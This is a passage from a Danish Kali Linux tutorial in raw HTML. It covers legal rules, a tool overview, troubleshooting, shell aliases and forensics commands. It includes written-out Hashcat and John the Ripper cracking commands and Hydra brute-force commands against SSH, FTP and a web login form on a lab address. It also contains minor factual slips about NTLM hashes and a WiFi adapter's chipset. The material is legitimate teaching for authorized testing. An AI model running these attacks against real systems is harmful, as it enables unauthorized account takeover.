sikkerhed<\/td><td>Begr\u00e6nset<\/td><td>St\u00e6rkt fokus<\/td><td>Ingen s\u00e6rlig fokus<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Kali Linux er standardvalget for professionelle fordi det har den bedste dokumentation, det mest aktive community og er den platform som bruges i OSCP-certificeringseksamenen fra Offensive Security. Parrot OS er et godt alternativ for begyndere der \u00f8nsker et lettere system med fokus p\u00e5 privatliv ud over sikkerhedstestning. BlackArch er kun relevant for erfarne Arch Linux-brugere der har behov for det absolut bredeste udvalg af specialiserede sikkerhedsv\u00e6rkt\u00f8jer og foretr\u00e6kker fuld kontrol over systemet.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"juridiske-krav-og-nis2-for-danske-brugere\">Juridiske krav og NIS2 for danske brugere<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Kali Linux er fuldst\u00e6ndigt lovligt at downloade, installere og bruge i Danmark. Det er brugen, ikke softwaren selv, der kan v\u00e6re ulovlig. I Danmark reguleres uautoriseret adgang til computersystemer af straffelovens \u00a7 263. Overtr\u00e6delse kan medf\u00f8re f\u00e6ngsel i op til 1,5 \u00e5r for simple tilf\u00e6lde og op til 6 \u00e5r for grove overtr\u00e6delser der involverer kritisk infrastruktur eller organiseret kriminalitet.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Den grundl\u00e6ggende etiske regel er enkel: brug kun Kali Linux mod netv\u00e6rk og systemer du ejer, eller som du har <strong>udtrykkelig skriftlig tilladelse<\/strong> til at teste. En mundtlig aftale er utilstr\u00e6kkelig juridisk dokumentation.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>NIS2-direktivet<\/strong> og den <a href=\"\/nis2-danmark-krav-2026\/\">danske NIS2-implementering<\/a> kr\u00e6ver at virksomheder inden for kritisk infrastruktur gennemf\u00f8rer regelm\u00e6ssige sikkerhedsvurderinger. If\u00f8lge vores analyse af <a href=\"\/cybertrusler-norden-2026\/\">cybertrusler i Norden 2026<\/a> er antallet af sikkerhedsh\u00e6ndelser steget markant, hvilket understreger behovet for proaktiv sikkerhedstestning. Autoriserede penetrationstests med Kali Linux er en anerkendt metode til at dokumentere NIS2-compliance.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For virksomheder der ans\u00e6tter penetrationstestere eller udf\u00f8rer interne sikkerhedstests g\u00e6lder disse bedste praksisser:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Udsted altid skriftlige autorisationsbreve (Letter of Authorization eller Rules of Engagement)<\/li><li>Definer pr\u00e6cist hvilke IP-adresser, dom\u00e6ner og systemer der m\u00e5 testes<\/li><li>Angiv testvinduet med konkrete datoer og tidspunkter<\/li><li>Beskriv tilladte testmetoder (black box, grey box eller white box)<\/li><li>F\u00e5 underskrift fra en person med tegningsret i den testede virksomhed<\/li><li>Gem al dokumentation i minimum 5 \u00e5r til mulig juridisk dokumentation<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"oversigt-kali-linux-sikkerhedsvaerktoejer\">Oversigt: Kali Linux-sikkerhedsv\u00e6rkt\u00f8jer<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Kali Linux organiserer sine 600+ forudinstallerede pakker i logiske kategorier i applikationsmenuen. F\u00f8lgende tabel giver et overblik over de vigtigste kategorier, de hyppigst brugte v\u00e6rkt\u00f8jer og deres prim\u00e6re anvendelsesomr\u00e5der.<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Kategori<\/th><th>Vigtigste v\u00e6rkt\u00f8jer<\/th><th>Prim\u00e6r anvendelse<\/th><th>Vanskeligheds-niveau<\/th><\/tr><\/thead><tbody><tr><td>Informationsindsamling<\/td><td>Nmap, Maltego, theHarvester, Shodan<\/td><td>Reconnaissance, OSINT, porte og tjenester<\/td><td>Begynder<\/td><\/tr><tr><td>S\u00e5rbarhedsanalyse<\/td><td>Nikto, OpenVAS, Lynis, Nessus<\/td><td>Automatisk scanning for kendte s\u00e5rbarheder<\/td><td>Begynder-Middel<\/td><\/tr><tr><td>Web-applikationstest<\/td><td>Burp Suite, OWASP ZAP, SQLmap, WFuzz<\/td><td>XSS, SQLi, CSRF, autentificeringsfejl<\/td><td>Middel<\/td><\/tr><tr><td>S\u00e5rbarhedsudnyttelse<\/td><td>Metasploit, BeEF, SearchSploit<\/td><td>Udnyttelse af dokumenterede CVE-s\u00e5rbarheder<\/td><td>Middel-Avanceret<\/td><\/tr><tr><td>Password-revision<\/td><td>Hashcat, John the Ripper, Hydra, CeWL<\/td><td>Hash-cracking, brute force, ordbogs-angreb<\/td><td>Middel<\/td><\/tr><tr><td>Tr\u00e5dl\u00f8s sikkerhed<\/td><td>Aircrack-ng, Kismet, Wifite, Reaver<\/td><td>WPA2\/WPA3-test, tr\u00e5dl\u00f8s netv\u00e6rksanalyse<\/td><td>Middel-Avanceret<\/td><\/tr><tr><td>Pakkeanalyse og sniffing<\/td><td>Wireshark, Tcpdump, Scapy, Ettercap<\/td><td>Trafikanalyse, MITM-simulering i autoriserede labs<\/td><td>Middel<\/td><\/tr><tr><td>Kryptografisk analyse<\/td><td>OpenSSL, GnuPG, SSLscan, TestSSL.sh<\/td><td>Certifikat-analyse, TLS-konfigurationstest<\/td><td>Avanceret<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Aircrack-ng suite, dokumenteret p\u00e5 <a href=\"https:\/\/aircrack-ng.org\/documentation.html\" target=\"_blank\" rel=\"noopener noreferrer\">aircrack-ng.org<\/a>, er det prim\u00e6re v\u00e6rkt\u00f8j til test af WiFi-sikkerheden. Husk at avanceret WiFi-test i VirtualBox kr\u00e6ver et USB WiFi-netkort der underst\u00f8tter monitor mode og packet injection, da de fleste VM-hostede netkort ikke underst\u00f8tter disse funktioner.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"5-hyppige-fejltagelser-og-faldgruber\">5 Hyppige fejltagelser og faldgruber<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Mange begyndere beg\u00e5r de samme fejl ved brug af Kali Linux. Her er de fem mest kritiske, med forklaring p\u00e5 konsekvenser og konkrete l\u00f8sninger.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"fejltagelse-1-kali-linux-som-primaer-computer\">Fejltagelse 1: Kali Linux som prim\u00e6r computer<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Kali Linux er designet til et dedikeret testmilj\u00f8, ikke til hverdagsbrug som browsing, e-mail og kontorarbejde. Mange Kali-tjenester k\u00f8rer med forh\u00f8jede rettigheder, og distributionen opdateres aggressivt, hvilket periodisk kan bryde stabiliteten. Brug VirtualBox og hold Kali isoleret fra dine personlige data og daglige aktiviteter.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"fejltagelse-2-springe-iso-verificering-over\">Fejltagelse 2: Springe ISO-verificering over<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Uofficielle download-spejle og torrent-sider kan indeholde trojanske ISO-filer med forudinstallerede bagd\u00f8re eller keyloggere. Dette er en reel trussel, dokumenteret i adskillige sikkerhedsh\u00e6ndelser. Verificer altid SHA256-checksummen fra kali.org inden du booter fra ISO-filen (se Trin 1 for pr\u00e6cise kommandoer).<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"fejltagelse-3-test-mod-produktionssystemer-uden-aftale\">Fejltagelse 3: Test mod produktionssystemer uden aftale<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Nmap-skanninger mod produktionssystemer kan overbelaste svage routere og firewalls. Metasploit-eksploits kan crashe servere og for\u00e5rsage driftstab. Wireshark-opfangning p\u00e5 en delt netv\u00e6rksforbindelse kan opfange tredjeparters persondata, hvilket er et GDPR-brud. Brug altid et isoleret lab-milj\u00f8 og indhent skriftlig tilladelse inden test af produktionssystemer.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"fejltagelse-4-glemme-snapshots\">Fejltagelse 4: Glemme snapshots<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Mange sikkerhedsv\u00e6rkt\u00f8jer \u00e6ndrer systemkonfigurationer, installerer afh\u00e6ngigheder eller efterlader spor der kan forurene fremtidige tests. Tag et VirtualBox-snapshot <strong>inden<\/strong> hvert test-engagement. Med et snapshot kan du nulstille til en ren tilstand p\u00e5 under 30 sekunder i stedet for at geninstallere hele systemet.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"fejltagelse-5-forladte-systemopdateringer\">Fejltagelse 5: Forladte systemopdateringer<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Et for\u00e6ldet Metasploit mangler eksploit-moduler for de seneste kendte CVE-s\u00e5rbarheder. En for\u00e6ldet Nmap-version kan give un\u00f8jagtige porte og tjenestedetekteringsresultater. Opdater systemet minimum ugentligt med <code>sudo apt update && sudo apt full-upgrade -y<\/code>, og opdater Metasploit-modulernes database separat med <code>msfupdate<\/code> inden hvert engagement.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"fejlfinding-9-hyppige-problemer-med-loesninger\">Fejlfinding: 9 Hyppige problemer med l\u00f8sninger<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Her er de mest hyppige fejlmeddelelser og problemer som begyndere m\u00f8der med Kali Linux i VirtualBox, med pr\u00e6cise l\u00f8sninger der er verificeret mod den officielle <a href=\"https:\/\/www.kali.org\/docs\/installation\/hard-disk-install\/\" target=\"_blank\" rel=\"noopener noreferrer\">Kali installationsdokumentation<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Fejl \/ Problem<\/th><th>Sandsynlig \u00e5rsag<\/th><th>L\u00f8sning<\/th><\/tr><\/thead><tbody><tr><td><code>VT-x\/AMD-V not available<\/code><\/td><td>Virtualisering deaktiveret i BIOS<\/td><td>Genstart, g\u00e5 i BIOS (F2\/F10\/Delete), aktiver Intel VT-x eller AMD-V<\/td><\/tr><tr><td>Sort sk\u00e6rm efter opstart<\/td><td>For lidt Video RAM<\/td><td>S\u00e6t Video Memory til 128 MB i VM-indstillinger, deaktiver 3D-acceleration<\/td><\/tr><tr><td><code>E: Could not get lock \/var\/lib\/apt\/lists\/lock<\/code><\/td><td>En anden apt-proces k\u00f8rer<\/td><td><code>sudo rm \/var\/lib\/apt\/lists\/lock \/var\/cache\/apt\/archives\/lock && sudo apt update<\/code><\/td><\/tr><tr><td><code>Temporary failure resolving<\/code><\/td><td>DNS-problem i VM<\/td><td>S\u00e6t VM-netv\u00e6rk til NAT, tjek <code>\/etc\/resolv.conf<\/code> (skal indeholde nameserver 8.8.8.8)<\/td><\/tr><tr><td>Lav sk\u00e6rmopl\u00f8sning, kan ikke \u00e6ndres<\/td><td>Guest Additions ikke installeret<\/td><td><code>sudo apt install virtualbox-guest-x11 && sudo reboot<\/code><\/td><\/tr><tr><td>Metasploit kan ikke forbinde til database<\/td><td>PostgreSQL k\u00f8rer ikke<\/td><td><code>sudo systemctl start postgresql && sudo msfdb reinit<\/code><\/td><\/tr><tr><td>Nmap kr\u00e6ver root: <code>SOCKET: Permission denied<\/code><\/td><td>SYN-scanning kr\u00e6ver raw sockets<\/td><td>Brug <code>sudo nmap<\/code> eller skift til TCP Connect-skanning: <code>nmap -sT<\/code><\/td><\/tr><tr><td>Wireshark viser ingen capture-interfaces<\/td><td>K\u00f8rer ikke med tilstr\u00e6kkelige rettigheder<\/td><td><code>sudo usermod -aG wireshark $USER<\/code>, log ud og ind igen<\/td><\/tr><tr><td>Docker-containere kan ikke tilg\u00e5s fra browseren<\/td><td>Port-binding fejl<\/td><td>Verificer at Docker k\u00f8rer med <code>sudo systemctl status docker<\/code> og at port 3000 ikke er optaget<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"avancerede-tips-til-professionel-brug\">Avancerede tips til professionel brug<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">N\u00e5r du har mestret grundl\u00e6ggende Kali Linux-installation og de vigtigste v\u00e6rkt\u00f8jer, er der adskillige teknikker der l\u00f8fter arbejdet til et professionelt niveau.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Brug kali-tweaks til systemkonfiguration:<\/strong> Kali inkluderer et GUI-konfigurationsv\u00e6rkt\u00f8j der lader dig hurtigt skifte shell (bash\/zsh), installere tilpassede metapakker til specifikke opgaver (tr\u00e5dl\u00f8s test, forensics, web-test) og konfigurere SSH og Bluetooth. Start det med <code>kali-tweaks<\/code> i terminalen.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Opret nyttige shell-aliaser:<\/strong> Tilf\u00f8j dette til din <code>~\/.zshrc<\/code> eller <code>~\/.bashrc<\/code> for hurtigere arbejdsgange:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Hurtige Nmap-aliaser\nalias nmap-quick='sudo nmap -sV -T4 -F'\nalias nmap-full='sudo nmap -sV -sC -p- -T4'\nalias nmap-udp='sudo nmap -sU -T4 --top-ports 100'\n\n# Metasploit-opstart med PostgreSQL\nalias msfstart='sudo systemctl start postgresql && msfconsole'\n\n# Systemvedligeholdelse\nalias update-kali='sudo apt update && sudo apt full-upgrade -y && sudo apt autoremove -y'\n\n# Hurtig HTTP-server til filoverf\u00f8rsel\nalias http-server='python3 -m http.server 8000'<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>L\u00e6r tmux til sessionsadministration:<\/strong> tmux lader dig dele en terminalvindue i multiple paneler og bevarer dine sessioner selv hvis forbindelsen mistes. Det er uundv\u00e6rligt ved langvarige scanninger og fjerntest:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Installer tmux\nsudo apt install -y tmux\n\n# Start en ny named session\ntmux new -s pentest\n\n# Split horisontalt (Ctrl+B, %)\n# Split vertikalt (Ctrl+B, \")\n# Navig\u00e9r mellem paneler (Ctrl+B, piletaster)\n# Detach fra session (Ctrl+B, D)\n# Genvedh\u00e6ft session: tmux attach -t pentest<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Dokument\u00e9r med CherryTree eller Obsidian:<\/strong> Professionelle penetrationstestere dokumenterer hvert trin grundigt. CherryTree er inkluderet i Kali og underst\u00f8tter hierarkiske noter med syntaksfremh\u00e6vning til kommandoer. God dokumentation er det der adskiller en rapport der f\u00f8rer til rettede s\u00e5rbarheder fra en der samler st\u00f8v.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Kali NetHunter til mobil test:<\/strong> Kali NetHunter er en Android-overlay der giver Kali-funktionalitet p\u00e5 kompatible Android-enheder. Det er praktisk til on-site engagementer og tr\u00e5dl\u00f8s sikkerhedstest. Se kali.org\/nethunter for underst\u00f8ttede enheder.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For at forst\u00e5 de web-applikationss\u00e5rbarheder du finder under test, anbefaler vi vores vejledninger om <a href=\"\/webauthn-nodejs-passkeys\/\">WebAuthn og passwordless authentication<\/a> og <a href=\"\/sikker-session-nodejs\/\">sikker session-h\u00e5ndtering i Node.js<\/a>. At forst\u00e5 forsvarssiden g\u00f8r dig til en bedre angriber og omvendt. Se ogs\u00e5 vores artikel om <a href=\"\/ssl-tls-certifikat-certbot-2026\/\">SSL\/TLS-certifikater<\/a> for at forst\u00e5 certifikatinfrastrukturen du tester imod.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"relateret-daekning\">Relateret d\u00e6kning<\/h2>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"\/nis2-danmark-krav-2026\/\">NIS2 Danmark: 6.000 virksomheder, kun 16% klar [2026]<\/a><\/li><li><a href=\"\/cybertrusler-norden-2026\/\">Cybertrusler i Norden: 166 h\u00e6ndelser, AI driver 70% [2026]<\/a><\/li><li><a href=\"\/sql-injection-nodejs\/\">SQL Injection i Node.js: 12 trin til sikker database [2026]<\/a><\/li><li><a href=\"\/ssl-tls-certifikat-certbot-2026\/\">Gratis SSL\/TLS-certifikat: 12 trin med Certbot [2026]<\/a><\/li><li><a href=\"\/webauthn-nodejs-passkeys\/\">WebAuthn i Node.js: Passwordless login i 12 trin [2026]<\/a><\/li><li><a href=\"\/sikker-session-nodejs\/\">Sikker session i Node.js: 12 trin p\u00e5 30 min [2026]<\/a><\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"ofte-stillede-spoergsmaal-om-kali-linux\">Ofte stillede sp\u00f8rgsm\u00e5l om Kali Linux<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"er-kali-linux-lovligt-at-bruge-i-danmark\">Er Kali Linux lovligt at bruge i Danmark?<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Ja, Kali Linux er fuldst\u00e6ndigt lovligt at downloade, installere og bruge i Danmark. Det er et legitimt og anerkendt sikkerhedsv\u00e6rkt\u00f8j brugt af tusindvis af professionelle sikkerhedsforskere og penetrationstestere. Det er <strong>brugen<\/strong> der kan v\u00e6re ulovlig: brug kun Kali&#8217;s v\u00e6rkt\u00f8jer mod systemer du ejer eller har udtrykkelig skriftlig tilladelse til at teste. Uautoriseret adgang til fremmede systemer er strafbart under straffelovens \u00a7 263.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"kraever-kali-linux-programmeringskendskab\">Kr\u00e6ver Kali Linux programmeringskendskab?<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Grundl\u00e6ggende Kali Linux-brug kr\u00e6ver ingen programmeringskendskab, men kendskab til Linux-kommandolinjen er n\u00f8dvendigt. Bash-scripting er nyttigt til at automatisere gentagne opgaver, og Python-kendskab er en stor fordel til at skrive egne exploits og automatiseringsscripts. De fleste seri\u00f8se penetrationstestere l\u00e6rer Python og Bash parallelt med Kali Linux&#8217;s v\u00e6rkt\u00f8jer.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"kan-jeg-installere-kali-linux-direkte-paa-min-baerbare\">Kan jeg installere Kali Linux direkte p\u00e5 min b\u00e6rbare?<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Ja, du kan installere Kali Linux p\u00e5 fysisk hardware (bare-metal) eller som dual-boot ved siden af Windows. Bare-metal-installation giver bedre ydeevne og direkte adgang til netv\u00e6rkshardware, som er vigtigt for tr\u00e5dl\u00f8s sikkerhedstest. Til \u00f8velse anbefaler vi VirtualBox fordi det er nemmere at oprette snapshots, isolere testnetv\u00e6rk og nulstille til en ren tilstand.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"hvad-er-forskellen-paa-kali-linux-og-parrot-os\">Hvad er forskellen p\u00e5 Kali Linux og Parrot OS?<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Begge er Debian-baserede sikkerhedsdistributioner, men de har forskellige styrker. Kali Linux har 600+ forudinstallerede sikkerhedsv\u00e6rkt\u00f8jer, fremragende dokumentation og er den anbefalede platform til OSCP-certificeringen. Parrot OS bruger mindre RAM, er mere brugervenligt for begyndere og har ekstra fokus p\u00e5 privatliv. For professionelle penetrationstestere er Kali Linux industristandardvalget.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"hvor-lang-tid-tager-det-at-laere-kali-linux\">Hvor lang tid tager det at l\u00e6re Kali Linux?<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">At installere og navigere grundl\u00e6ggende i Kali Linux tager et par dage. At blive fortrolig med Nmap, Metasploit og Burp Suite tager typisk 1-3 m\u00e5neder med daglig \u00f8velse p\u00e5 bevidst s\u00e5rbare VMs. OSCP-certificeringens niveau kr\u00e6ver for de fleste 6-12 m\u00e5neder af dedikeret studie, inklusiv mindst 90 dages lab-adgang fra Offensive Security&#8217;s PWK-kursus.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"kan-jeg-bruge-kali-linux-til-at-teste-mit-eget-wifi-netvaerks-sikkerhed\">Kan jeg bruge Kali Linux til at teste mit eget WiFi-netv\u00e6rks sikkerhed?<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Ja, det er fuldt lovligt at teste sikkerheden p\u00e5 dit eget WiFi-netv\u00e6rk med Kali Linux og Aircrack-ng. Det er en effektiv m\u00e5de at verificere om dit WPA2\/WPA3-kodeord er tilstr\u00e6kkeligt st\u00e6rkt. Bem\u00e6rk at tr\u00e5dl\u00f8s test kr\u00e6ver et netkort der underst\u00f8tter monitor mode. Mange laptops&#8217; interne netkort underst\u00f8tter ikke dette i VirtualBox. En ekstern USB WiFi-adapter med Atheros- eller Ralink-chipset (fx Alfa AWUS036ACH) er den nemmeste l\u00f8sning.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"hvad-koster-oscp-certificeringen\">Hvad koster OSCP-certificeringen?<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">OSCP (Offensive Security Certified Professional) koster 1.499 USD for PEN-200-kurset med 90 dages lab-adgang og \u00e9t eksamensfors\u00f8g. Prisen stiger med 249 USD per ekstra 30 dages lab-adgang og 249 USD per yderligere eksamensfors\u00f8g. Certificeringen er bredt anerkendt som industristandardet for professionelle penetrationstestere og \u00e5bner typisk for l\u00f8nstigninger p\u00e5 15-30% if\u00f8lge CompTIA&#8217;s 2025 IT-l\u00f8nunders\u00f8gelse.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"kraever-nis2-penetrationstestning-med-kali-linux\">Kr\u00e6ver NIS2 penetrationstestning med Kali Linux?<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">NIS2-direktivet kr\u00e6ver at virksomheder inden for kritisk infrastruktur og vigtige sektorer implementerer &#8220;passende og forholdsm\u00e6ssige tekniske og organisatoriske foranstaltninger&#8221; til risikostyring. Penetrationstestning er en anerkendt og anbefalet metode til at opfylde disse krav, men NIS2 specificerer ikke hvilke v\u00e6rkt\u00f8jer der skal bruges. Kali Linux er det mest udbredte og accepterede v\u00e6rkt\u00f8j til autoriserede penetrationstests og underst\u00f8tter dokumentationen af NIS2-compliance.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"trin-11-password-cracking-med-hashcat-og-john-the-ripper\">Trin 11: Password-cracking med Hashcat og John the Ripper<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Password-cracking er en central del af penetrationstestning. N\u00e5r en angriber har opn\u00e5et adgang til en database med hashed adgangskoder, er n\u00e6ste skridt at fors\u00f8ge at cracke dem for at demonstrere over for klienten, hvad en rigtig angriber ville kunne opn\u00e5. Kali Linux inkluderer to industristandard-v\u00e6rkt\u00f8jer til dette form\u00e5l: Hashcat og John the Ripper.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Hashcat<\/strong> er verdens hurtigste CPU- og GPU-baserede password-cracker og underst\u00f8tter over 300 hashtyper. Det udnytter GPU&#8217;ens parallelprocessering til at pr\u00f8ve milliarder af kombinationer per sekund. Tjek at Hashcat er installeret:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>hashcat --version<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Eksempel p\u00e5 Hashcat mod en MD5-hash (svarende til NTLM-hashes fra Windows-systemer):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Cracking mode 0 = Straight (ordbog), hashtype 0 = MD5\nhashcat -m 0 -a 0 hashes.txt \/usr\/share\/wordlists\/rockyou.txt\n\n# For SHA-256 (hashtype 1400)\nhashcat -m 1400 -a 0 hashes.txt \/usr\/share\/wordlists\/rockyou.txt\n\n# For bcrypt (hashtype 3200, markant langsommere pga. bcrypt's design)\nhashcat -m 3200 -a 0 hashes.txt \/usr\/share\/wordlists\/rockyou.txt\n\n# Se fremgang under k\u00f8rsel\nhashcat -m 0 -a 0 hashes.txt \/usr\/share\/wordlists\/rockyou.txt --status<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>John the Ripper<\/strong> er et \u00e6ldre og mere fleksibelt alternativ til Hashcat, der automatisk detekterer hashformater og er lettere at bruge for begyndere. Det inkluderer en passwordliste og en regelmotor til at generere variationer:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Lad John automatisk detektere hashformat\njohn hashes.txt\n\n# Brug en specifik ordbog\njohn --wordlist=\/usr\/share\/wordlists\/rockyou.txt hashes.txt\n\n# Vis crackede passwords\njohn --show hashes.txt\n\n# Brug regler til at generere variationer (tilf\u00f8jer tal, store bogstaver osv.)\njohn --wordlist=\/usr\/share\/wordlists\/rockyou.txt --rules hashes.txt<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Rockyou.txt er Kali Linux&#8217;s mest kendte ordbogsfil med over 14 millioner password-varianter. Det er komprimeret og skal udpakkes ved f\u00f8rste brug:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo gunzip \/usr\/share\/wordlists\/rockyou.txt.gz\nwc -l \/usr\/share\/wordlists\/rockyou.txt\n# Output: 14344392 \/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Resultaterne fra password-cracking-tests viser klienterne pr\u00e6cis, hvilke adgangskoder der er svage nok til at crackes p\u00e5 f\u00e5 sekunder, og giver konkret dokumentation for behovet for st\u00e6rkere adgangskodepolitikker. Vores artikel om <a href=\"\/ssl-tls-certifikat-certbot-2026\/\">TLS-certifikater<\/a> forklarer supplerende, hvordan kryptografi bruges til at beskytte hemmeligheder under overf\u00f8rsel.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"trin-12-hydra-til-login-brute-forcing\">Trin 12: Hydra til login brute-forcing<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Hydra er et hurtigt og fleksibelt online brute-force-angrebsv\u00e6rkt\u00f8j der underst\u00f8tter over 50 protokoller, herunder SSH, FTP, HTTP, HTTPS, RDP, SMB og databaseservere. Det bruges af penetrationstestere til at demonstrere svage loginbeskyttelser p\u00e5 autoriserede systemer.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hydra kr\u00e6ver altid skriftlig tilladelse. Brug kun mod dine egne systemer eller systemer i dit lukkede lab. Et enkelt Hydra-angreb mod en produktionsserver kan l\u00e5se konti ud og generere tusindvis af fejllog-indtastninger.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># SSH brute-force mod din egen Kali-VM (kun test form\u00e5l)\nhydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/192.168.56.101\n\n# HTTP POST login-formular test\nhydra -l admin -P passwords.txt 192.168.56.101 http-post-form \\\n  \"\/login.php:username=^USER^&password=^PASS^:Invalid credentials\"\n\n# FTP brute-force\nhydra -l ftp_user -P \/usr\/share\/wordlists\/rockyou.txt ftp:\/\/192.168.56.101\n\n# Begr\u00e6ns fors\u00f8g til 4 per sekund for at undg\u00e5 lockouts\nhydra -l admin -P passwords.txt -t 4 ssh:\/\/192.168.56.101<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Forventet output ved succesfuldt fund:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>[22][ssh] host: 192.168.56.101   login: admin   password: password123\n1 of 1 target successfully completed, 1 valid password found<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Hydra-resultater demonstrerer for klienter, at svage adgangskoder og manglende rate-limiting p\u00e5 loginformularer udg\u00f8r en reel risiko. Vores vejledning om <a href=\"\/sikker-session-nodejs\/\">sikker session-h\u00e5ndtering i Node.js<\/a> d\u00e6kker, hvordan man beskytter login-endpoints mod pr\u00e6cis s\u00e5danne angreb med rate-limiting og account lockout-mekanismer.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"digitalt-retsmedicin-med-kali-linux\">Digitalt retsmedicin med Kali Linux<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Ud over offensiv penetrationstestning er Kali Linux et kraftfuldt platform til digitalt retsmedicin (digital forensics). Forensics-tilstand booter Kali uden at mounte nogen diske automatisk eller efterlade spor p\u00e5 det unders\u00f8gte system, hvilket er afg\u00f8rende for at bevare bevisintegriteten.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For at boote i Forensics-tilstand v\u00e6lges &#8220;Live system (forensics mode)&#8221; i bootmenuen. Verificer at diske ikke er mounted:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Verificer at ingen diske er auto-mounted\nmount | grep -v tmpfs | grep -v proc | grep -v sysfs<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Nyttige forensics-kommandoer inkluderet i Kali:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Opret et bit-for-bit disk-image (bevarer metadata)\nsudo dd if=\/dev\/sdb of=\/media\/usb\/evidence.img bs=512 status=progress\n\n# Verificer image-integritet med SHA-256\nsha256sum \/media\/usb\/evidence.img > \/media\/usb\/evidence.img.sha256\n\n# Analyser filsystem med Autopsy (grafisk forensics-platform)\nautopsy &\n\n# S\u00f8g efter slettede filer med Photorec\nsudo photorec \/dev\/sdb<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Volatility er det prim\u00e6re RAM-forensics-v\u00e6rkt\u00f8j og kan analysere memory-dumps fra Windows, Linux og macOS-systemer for at finde processer, netv\u00e6rksforbindelser og kryptografiske n\u00f8gler i hukommelsen. Det er installeret i Kali&#8217;s full-installation:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Identificer OS-profil for et memory-dump\nvolatility -f memory.dmp imageinfo\n\n# List k\u00f8rende processer p\u00e5 tidspunktet for dump\nvolatility -f memory.dmp --profile=Win10x64_19041 pslist\n\n# Find netv\u00e6rksforbindelser\nvolatility -f memory.dmp --profile=Win10x64_19041 netscan<\/code><\/pre>\n\n\n\n<p 